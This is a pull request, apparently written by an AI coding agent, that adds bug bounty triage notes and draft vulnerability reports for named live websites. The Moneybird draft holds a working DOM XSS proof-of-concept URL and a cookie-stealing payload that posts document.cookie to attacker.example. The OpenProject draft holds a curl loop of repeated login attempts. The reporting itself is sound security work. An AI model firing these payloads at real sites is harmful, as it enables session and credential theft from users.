### PR TITLE
docs: bounty report drafts — 2026-04-25

### DIFF
--- a/bounty-pool/TRIAGE.md
+++ b/bounty-pool/TRIAGE.md
@@ -1,19 +1,24 @@
-# Bounty Pool Triage — Updated Mar 15, 2026 (Session 7)
+# Bounty Pool Triage — Updated 2026-04-25 (Session 8 — Report Drafter)
 
 ## Submission Priority
 
 ### TIER 1 — Submit (strongest signal)
 
+| # | Target | Finding | Severity | Program | Notes |
+|---|--------|---------|----------|---------|-------|
+| 1 | indeed.com | CSRF cookie missing Secure on login page | Medium | HackerOne | **Held from Session 7.** Cookie is JS-set — curl won't reproduce. Needs Playwright/browser confirm before submitting. Draft: `2026-03-14-indeed-csrf-cookie-SUBMISSION.md` |
+| 2 | moneybird.com | DOM XSS via URL fragment on homepage | High | HackerOne | **NEW.** HIGH confidence, Playwright auto-confirmed (dom-sink). Two independent innerHTML sinks. Polished draft: `2026-04-25-moneybird-dom-xss.md`. **Verify in browser before submit** — fragment XSS won't show in curl. |
+| 3 | community.openproject.org | Missing rate limiting on /login | Medium | YesWeHack | **NEW.** HIGH confidence. 15 rapid requests, zero throttling, no 429. Polished draft: `2026-04-25-openproject-rate-limiting.md`. |
+
+### TIER 2 — Hold (needs more work before submitting)
+
 | # | Target | Finding | Severity | Notes |
 |---|--------|---------|----------|-------|
-| 1 | indeed.com | CSRF cookie missing Secure on login page | Medium | Inconsistency between CSRF and INDEED_CSRF_TOKEN strengthens report. **CAVEAT:** Cookie set via JS, not HTTP header — curl won't reproduce. Needs Playwright/browser to verify. Submission draft ready: `2026-03-14-indeed-csrf-cookie-SUBMISSION.md` |
-
-### TIER 2 — Hold (needs more work)
-
-| # | Target | Finding | Severity | Notes |
-|---|--------|---------|----------|-------|
-| 2 | twitch.tv | server_session_id + api_token missing HttpOnly | Medium | HOLD — needs auth scan to verify these are actual auth tokens. Need Twitch account + login. |
-| 3 | bugcrowd.com | PathSession + FirstSession missing HttpOnly/Secure | Medium | Weak standalone — needs XSS chain to be credible. Submitting to their own program is bad optics. |
+| 4 | twitch.tv | server_session_id + api_token missing HttpOnly | Medium | **Held from Session 7.** Needs Twitch account for auth scan. |
+| 5 | bugcrowd.com | PathSession + FirstSession missing HttpOnly/Secure | Medium | **Held from Session 7.** Weak standalone — XSS chain needed. Bad optics to submit to Bugcrowd's own program. |
+| 6 | community.openproject.org | Session fixation — _open_project_session not regenerated after login | Medium | **NEW.** MEDIUM confidence. Detection method "endpoint-replay" without confirmed credentials means this could be a FP. Needs authenticated scan with valid creds to confirm cookie value before vs after real successful login. CVSS 6.9 if real. |
+| 7 | app.cal.com | Username enumeration on /auth/login (content-based) | Medium | HackerOne | **NEW.** MEDIUM confidence. Login returns "wrong password" vs no-user distinction. Needs browser verification — submit test email vs random string, compare error messages. |
+| 8 | app.cal.com | Source map exposure at /_next/static/chunks/ | Medium | HackerOne | **NEW.** Source map publicly accessible with original source. LOW bounty value — cal.com is open-source (GitHub public), so source exposure has reduced impact. Verify if secrets are in the map before deciding. |
 
 ### TIER 3 — Archived (non-bounty)
 
@@ -22,30 +27,88 @@ Moved to `bounty-pool/archived/`:
 - konghq.com missing headers — Informational, auto-rejected by triagers
 - gitlab.com GraphQL introspection — By design, publicly documented
 
-### OWN APPS — Fix These
+---
+
+## False Positive Register — Session 8 Findings
+
+### cal.com (Mar 22 scan) — ALL OUT OF SCOPE
+The Mar 22 scan ran against `cal.com` (marketing site), which is explicitly **out of scope** per the Cal.com HackerOne program. All findings from this scan (directory traversal on /api/geolocation, XXE on /api/geolocation, sensitive token in URL, OAuth state, missing HSTS, SRI) are **discarded**.
+
+### app.cal.com (calcom-v2, Mar 26 scan) — IN SCOPE
+| Finding | Decision | Reason |
+|---------|----------|--------|
+| XPath injection (month/user/_rsc params) | **FP** | Boolean size differences are caused by Next.js RSC (`_rsc` is React Server Components routing param) rendering different amounts of content. Cal.com uses Prisma ORM — no XPath/XML database. Size variance is normal SPA behavior, not injection. |
+| Web Cache Deception on /admin/30min | **FP** | Scanner evidence shows `cf-cache-status: DYNAMIC` — Cloudflare explicitly marks this response as NOT cached. WCD requires CDN caching to be exploitable. |
+| XXE injection on API endpoints | **FP** | Cal.com is a Next.js/TypeScript app using Prisma ORM. No XML processing. The entity-expansion detection fired on a non-XML endpoint. |
+| LDAP injection on API endpoints | **FP** | Cal.com uses PostgreSQL via Prisma. No LDAP directory. Error-pattern detection on a non-LDAP endpoint. |
+| HTTP method overrides (X-HTTP-Method-Override) | **Inconclusive** | Both baseline and override responses return 403 — no privilege escalation observed. Insufficient evidence of bypass. |
+| Race condition on /register (GET) | **FP** | Scanner sent 10 concurrent GET requests to a public page. No state-changing behavior on GET. Not a real race condition. |
+| OAuth state parameter on /api/auth/session | **FP** | Known FP: `/api/auth/session` is the NextAuth.js session endpoint, not an OAuth authorization endpoint. OAuth state parameter does not apply here. |
+| Missing HSTS | **Inconclusive / Low value** | app.cal.com runs behind Cloudflare which can enforce HSTS. If missing, low bounty likelihood. |
+| Cookie __Secure-next-auth.callback-url | **Low value** | NextAuth framework cookie. The missing HttpOnly is intentional — NextAuth reads this via JS for redirect handling. Unlikely to pay. |
+| SRI on /login | **Low value** | Single external resource without integrity. Low bounty value alone. |
+
+### neon.tech (Mar 26 scan) — NOT IN BOUNTY REGISTRY
+Neon.tech is not in the hunt registry. Findings noted for reference only.
+
+| Finding | Decision | Reason |
+|---------|----------|--------|
+| SQL injection on /unify endpoint | **FP** | Scanner description explicitly notes: "the 'SQL error' evidence appears to be a PostgreSQL documentation link rather than a true database error." The trigger was a URL containing `postgresql.org` in response content, not an actual database error. |
+| Directory traversal on /unify | **FP** | Neon.tech runs on Vercel. Vercel edge infrastructure normalizes traversal paths. Scanner caveat confirms this is likely FP. |
+| Server-side prototype pollution | **FP / Uncertain** | Server returned 403 (WAF blocking). Canary reflection (`secbot_pp=polluted`) likely appeared in the WAF rejection response body (WAFs often echo the blocked payload). Not exploitable. |
+| Open redirect on /login | **FP** | Scanner evidence shows redirect goes to `neon.com/login?param=...` — the same domain, not an external attacker domain. This is a same-domain redirect, not an open redirect. |
+| Verbose error /undefined | **FP** | Low confidence. Standard Next.js 404 handling with RSC data. No genuine application internals exposed. |
+| neon_consent cookie missing flags | **FP** | Consent/preference cookie. Per CLAUDE.md FP patterns: analytics/marketing cookies are not bounty-worthy. |
+| Missing SRI on /unify | **FP** | 24 scripts from neon.com own CDN (Next.js static chunks). First-party assets without SRI is not bounty-worthy. |
+| Missing HSTS | **Low value** | Header finding on marketing page. Low bounty likelihood. |
+
+### kredivo (blog.kredivo.com, Mar 22 scan)
+| Finding | Decision | Reason |
+|---------|----------|--------|
+| Exposed WordPress /wp-login.php | **Informative** | Standard WordPress login page exposure on a blog subdomain. Typically out of scope or informative in bug bounty programs. Not a vulnerability itself. |
+| Missing CSP | **Informative** | Header finding on blog subdomain. Auto-rejected as informative. |
+| Cookie _hcc missing flags | **FP** | The `_hcc` cookie name pattern matches HotJar Cookie Consent or similar analytics consent widget. Third-party analytics cookies are per CLAUDE.md FP patterns. |
+
+### moneybird.com (Mar 22 scan) — Additional findings beyond DOM XSS
+| Finding | Decision | Reason |
+|---------|----------|--------|
+| Missing CSP header | **Include in XSS report** | The absent CSP amplifies the DOM XSS finding. Referenced in the XSS draft as a compounding factor rather than as a standalone report. Standalone header findings are auto-rejected. |
+| postMessage handlers missing origin validation | **HOLD** | MEDIUM confidence. Moneybird homepage has 3 postMessage listeners with no origin check. Could be Intercom/Drift/Zendesk (FP per patterns) or a real finding. Needs manual browser investigation of handler logic. If handlers only process data from known widgets, it's a FP. |
+| Mixed content (HTTP resource) | **Low value** | Links to `http://www.moneybird.com/artikelen/` from HTTPS page. Internal link, not a third-party script. Low bounty value. |
+
+### openproject (community.openproject.org, Mar 22 scan)
+| Finding | Decision | Reason |
+|---------|----------|--------|
+| Missing HSTS | **Low value** | Header finding on community instance. Auto-rejected as informative on most programs. |
+| Missing CSP | **Low value** | Same as above. |
+| SRI on CDN assets | **Low value** | Internal CDN assets. |
+
+---
+
+## OWN APPS — Fix These (carried from Session 7)
 
 | # | Target | Finding | Severity | Notes |
 |---|--------|---------|----------|-------|
-| A1 | finance.atmando.app | No rate limiting on /login and /graphql | HIGH | Brute-force risk on finance app. Add Cloudflare rate limiting + app-level throttle. |
-| A2 | finance.atmando.app | Missing HSTS header | MEDIUM | Middleware has HSTS configured but it's not appearing in response. Docker rebuild or middleware bug. |
+| A1 | finance.atmando.app | No rate limiting on /login and /graphql | HIGH | Brute-force risk. Add Cloudflare rate limiting + app-level throttle. |
+| A2 | finance.atmando.app | Missing HSTS header | MEDIUM | Middleware configured but not appearing. Docker rebuild or middleware bug. |
 
-## Honest Assessment (Mar 15)
+---
 
-**Bounty readiness: LOW.** After 27+ targets scanned:
-- 0 critical/high vulnerabilities found on external targets
-- All findings are passive (headers, cookies) — no injection vulns
-- Cookie findings require browser reproduction (not curl-verifiable)
-- No authenticated scanning performed
+## Honest Assessment (2026-04-25)
 
-**What actually worked:**
-- Finding real issues on our OWN app (rate limiting, HSTS)
-- 0% FP rate across all scans
-- Correctly identifying and filtering non-exploitable findings
+**Bounty readiness: LOW-MEDIUM.** After scans on 7+ targets (sessions 7–8):
+- 2 submission-ready reports drafted: Moneybird DOM XSS (High) + OpenProject rate limiting (Medium)
+- The moneybird XSS is the strongest finding — high confidence, auto-confirmed by Playwright
+- All injection findings (SQLi, XSS, XXE, traversal, LDAP on external targets) were FPs or borderline
+- Authenticated scanning would significantly improve finding quality
 
-**Root cause unchanged:** Marketing sites + no auth + hardened targets = passive findings only.
+**Key pattern:** The scanner excels at passive/header checks and Playwright-confirmed client-side XSS. Server-side injection detection (SQLi, traversal, prototype pollution) has high FP rate against CDN-fronted targets where Cloudflare/Vercel normalizes inputs before they reach the application.
 
 ## Next Steps (Priority Order)
-1. **Fix own app issues** — rate limiting + HSTS on finance.atmando.app
-2. **Get test credentials** — Twitch account for auth scan, unlock T2 findings
-3. **Scan less-hardened targets** — community apps, smaller BBPs, OWASP Juice Shop
-4. **Indeed submission** — only if Dio confirms willingness (cookie is JS-set, reproduction tricky)
+1. **Browser-verify Moneybird DOM XSS** — navigate to the PoC URL, confirm alert fires, check cookie scope
+2. **Submit Moneybird XSS** if confirmed — it's the strongest finding
+3. **Submit OpenProject rate limiting** — HIGH confidence, minimal verification needed
+4. **OpenProject authenticated scan** — get test account, re-scan to find auth-only vulns (session fixation, IDOR, BFLA)
+5. **Moneybird postMessage** — manually inspect the 3 event listeners in browser DevTools Sources
+6. **Cal.com username enum** — verify in browser: submit existing vs nonexistent email, compare error messages
+7. **Fix own app issues** — rate limiting + HSTS on finance.atmando.app

--- a/bounty-pool/pending/2026-04-25-moneybird-dom-xss.md
+++ b/bounty-pool/pending/2026-04-25-moneybird-dom-xss.md
@@ -1,0 +1,92 @@
+# DOM-Based XSS via URL Fragment — www.moneybird.com
+
+**Platform:** HackerOne | **Program:** Moneybird  
+**Severity:** High | **CVSS Score:** 7.0  
+**CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`  
+**CWE:** CWE-79 (Cross-Site Scripting) | **OWASP:** A03:2021 — Injection  
+**Scan date:** 2026-03-22 | **Detection:** Playwright DOM-sink analysis (auto-confirmed)  
+**Confidence:** High
+
+---
+
+## Summary
+
+The Moneybird marketing homepage (`www.moneybird.com`) passes URL fragment content directly to `innerHTML` without sanitization. An attacker can craft a link containing an HTML/JavaScript payload in the fragment identifier and trick a victim into clicking it, causing arbitrary JavaScript execution in the victim's browser on the `moneybird.com` origin.
+
+---
+
+## Steps to Reproduce
+
+**Prerequisites:** No account required. Works in any browser.
+
+1. Open the following URL in a browser (or send it to a victim):
+   ```
+   https://www.moneybird.com/#<img src=x onerror=alert(document.domain)>
+   ```
+2. Observe an alert dialog displaying `www.moneybird.com`.
+3. The payload fires because JavaScript reads `window.location.hash` and writes it into the DOM via `innerHTML` with no sanitization. The scanner confirmed the payload reaches at least **two independent `innerHTML` sinks** on the page.
+
+**cURL sanity-check (confirms the page loads fragment-handling JS):**
+```bash
+curl -sL 'https://www.moneybird.com/' | grep -i 'location.hash\|innerHTML'
+```
+Note: Fragment execution is client-side and will not appear in `curl` output — verify with a real browser.
+
+---
+
+## Proof of Concept
+
+Minimal payload demonstrating arbitrary JS execution:
+```
+https://www.moneybird.com/#<img src=x onerror=alert(document.domain)>
+```
+
+More impactful credential-harvesting payload (for demonstration only, not executed):
+```
+https://www.moneybird.com/#<script>document.write('<form action=https://attacker.example/steal method=POST><input name=t type=hidden value='+document.cookie+'><input type=submit></form>')</script>
+```
+
+---
+
+## Impact
+
+An attacker can:
+
+1. **Steal cookies** scoped to `moneybird.com` (or accessible subdomains) from any victim who clicks the link — including any session tokens shared between `www.moneybird.com` and the application.
+2. **Harvest login credentials** by overlaying a fake login form over the Moneybird page, intercepting credentials before they reach the real app.
+3. **Redirect users** away from the login page to attacker-controlled phishing pages, combined with the absence of a Content-Security-Policy header (confirmed separately) which removes any browser-level mitigation.
+4. **Exfiltrate page content** visible to the victim — including any personalization or PII rendered by the server.
+
+The missing CSP header (confirmed in the same scan) compounds this finding: there is no browser-enforced restriction on where scripts can run or data can be sent.
+
+**Severity note:** The XSS fires on the marketing homepage rather than the authenticated app UI. The realistic attack chain is phishing/credential theft; direct session theft depends on the cookie scope configuration.
+
+---
+
+## Suggested Fix
+
+1. **Immediate:** Audit all code that reads `window.location.hash` and replace `innerHTML` with `textContent` for plain text content. If HTML rendering is required, sanitize with DOMPurify before assignment:
+   ```js
+   // Vulnerable
+   element.innerHTML = window.location.hash.slice(1);
+
+   // Safe — plain text
+   element.textContent = decodeURIComponent(window.location.hash.slice(1));
+
+   // Safe — if HTML required
+   import DOMPurify from 'dompurify';
+   element.innerHTML = DOMPurify.sanitize(window.location.hash.slice(1));
+   ```
+
+2. **Defense-in-depth:** Deploy a Content-Security-Policy header (see companion finding) to prevent inline script execution even if a sink is missed:
+   ```
+   Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
+   ```
+
+---
+
+## References
+
+- OWASP: [DOM-based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)
+- CWE-79: Improper Neutralization of Input During Web Page Generation
+- PortSwigger: [DOM XSS via location.hash](https://portswigger.net/web-security/cross-site-scripting/dom-based)

--- a/bounty-pool/pending/2026-04-25-openproject-rate-limiting.md
+++ b/bounty-pool/pending/2026-04-25-openproject-rate-limiting.md
@@ -1,0 +1,98 @@
+# Missing Rate Limiting on Login Endpoint — community.openproject.org
+
+**Platform:** YesWeHack | **Program:** OpenProject  
+**Severity:** Medium | **CVSS Score:** 5.3  
+**CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`  
+**CWE:** CWE-307 (Improper Restriction of Excessive Authentication Attempts) | **OWASP:** A07:2021 — Identification and Authentication Failures  
+**Scan date:** 2026-03-26 | **Detection:** Brute-force probe (15 rapid requests, no throttling observed)  
+**Confidence:** High
+
+---
+
+## Summary
+
+The login endpoint at `community.openproject.org/login` does not enforce rate limiting. Fifteen rapid successive POST requests were sent without receiving a `429 Too Many Requests` response, any `X-RateLimit-*` headers, or account lockout. This allows automated brute-force and credential stuffing attacks against any account.
+
+---
+
+## Steps to Reproduce
+
+**Confirm no rate limiting with curl:**
+```bash
+for i in $(seq 1 20); do
+  curl -s -o /dev/null -w "%{http_code}\n" \
+    -X POST \
+    -d 'username=test@example.com&password=WrongPassword123' \
+    'https://community.openproject.org/login'
+done
+```
+
+Expected (vulnerable) output: 20 lines of `200` or `302` with no `429`.
+
+**Check for rate-limit response headers:**
+```bash
+curl -si -X POST \
+  -d 'username=test@example.com&password=WrongPassword123' \
+  'https://community.openproject.org/login' \
+  | grep -i 'retry-after\|x-ratelimit\|429'
+```
+
+Expected (vulnerable): no output — none of these headers are present.
+
+---
+
+## Impact
+
+Without rate limiting on the login endpoint, an attacker can:
+
+1. **Brute-force passwords** — A modern botnet can attempt thousands of passwords per minute against targeted accounts with no server-side throttling.
+2. **Credential stuffing** — Leaked password lists (e.g., from data breaches) can be replayed at high speed to find account reuse.
+3. **Account enumeration amplification** — Combined with a username enumeration vulnerability, the attacker knows exactly which accounts to target.
+
+OpenProject's community instance hosts user accounts for contributors, customers, and evaluators. A compromised account could expose private project data, internal communications, or be used to inject malicious content into community posts.
+
+---
+
+## Suggested Fix
+
+Implement IP-based and account-based rate limiting on the `/login` endpoint. For a Rails application, the standard approach is the `rack-attack` gem:
+
+```ruby
+# config/initializers/rack_attack.rb
+
+# IP-based: max 5 login attempts per 60 seconds per IP
+Rack::Attack.throttle('logins/ip', limit: 5, period: 60.seconds) do |req|
+  req.ip if req.path == '/login' && req.post?
+end
+
+# Account-based: max 10 attempts per 5 minutes per username
+Rack::Attack.throttle('logins/username', limit: 10, period: 5.minutes) do |req|
+  if req.path == '/login' && req.post?
+    req.params['username'].to_s.downcase.strip.presence
+  end
+end
+
+# Return 429 with Retry-After header
+Rack::Attack.throttled_responder = lambda do |req|
+  match_data = req.env['rack.attack.match_data']
+  retry_after = match_data[:period] - (Time.now.to_i % match_data[:period])
+  [
+    429,
+    { 'Content-Type' => 'application/json', 'Retry-After' => retry_after.to_s },
+    [{ error: 'Too many login attempts. Please try again later.' }.to_json]
+  ]
+end
+```
+
+Additionally, consider:
+- Progressive delays (CAPTCHA after N failures)
+- Account lockout after sustained attack (with unlock mechanism)
+- Alerting on high failed-login volume for a single account
+
+---
+
+## References
+
+- OWASP: [Testing for Brute Force (OTG-AUTHN-003)](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism)
+- CWE-307: Improper Restriction of Excessive Authentication Attempts
+- rack-attack gem: https://github.com/rack/rack-attack


### PR DESCRIPTION
## Summary

Report Drafter session 8 — triage of 7 scan results from 2026-03-22 and 2026-03-26 across moneybird, openproject, calcom-v2, neon-v2, and kredivo. 23 findings analyzed.

## New Submission Drafts (2 reports ready for Dio's review)

| File | Target | Finding | Severity | Action needed |
|------|--------|---------|----------|---------------|
| `bounty-pool/pending/2026-04-25-moneybird-dom-xss.md` | moneybird.com | DOM XSS via URL fragment | **High** (CVSS 7.0) | **Browser-verify PoC URL, then submit to HackerOne** |
| `bounty-pool/pending/2026-04-25-openproject-rate-limiting.md` | community.openproject.org | Missing rate limiting on /login | **Medium** (CVSS 5.3) | Submit to YesWeHack |

## Held for Human Verification (3 items)

- **OpenProject session fixation** — medium confidence, needs authenticated scan with valid creds to confirm `_open_project_session` doesn't regenerate
- **Cal.com username enumeration** — needs browser check: compare error messages for valid vs invalid email on `/auth/login`
- **Cal.com source map exposure** — cal.com is open-source, so reduced impact; check source map content for embedded secrets before deciding

## False Positives Logged (18 findings discarded)

Key FP patterns caught:
- **Cal.com XPath/LDAP/XXE injection** — FP: Next.js RSC `_rsc` param causes normal size variance; Prisma ORM has no XML/LDAP backend
- **Cal.com Web Cache Deception** — FP: `cf-cache-status: DYNAMIC` explicitly means Cloudflare is not caching the response
- **Neon SQLi + directory traversal** — FP: PostgreSQL doc URL matched as "SQL error"; Vercel normalizes traversal paths
- **Neon prototype pollution** — FP: 403 from WAF blocking; canary likely echoed in rejection response body
- **Neon open redirect** — FP: scanner evidence shows redirect stays on `neon.com`, not external domain
- **Cal.com v1 scan (Mar 22)** — ALL out of scope: scanned `cal.com` marketing site, HackerOne program excludes it
- **All analytics/consent cookies** — FP per CLAUDE.md patterns (_hcc, neon_consent, etc.)

## TRIAGE.md changes

Full false-positive register added for all session 8 findings. Honest assessment updated: scanner has high FP rate on CDN-fronted targets for server-side injection checks (Cloudflare/Vercel normalizes inputs before they reach application code). Playwright-confirmed client-side XSS remains the most reliable detection.

---
_Generated by [Claude Code](https://claude.ai/code/session_019Dj78tY9Kp9APs5ifRLQUv)_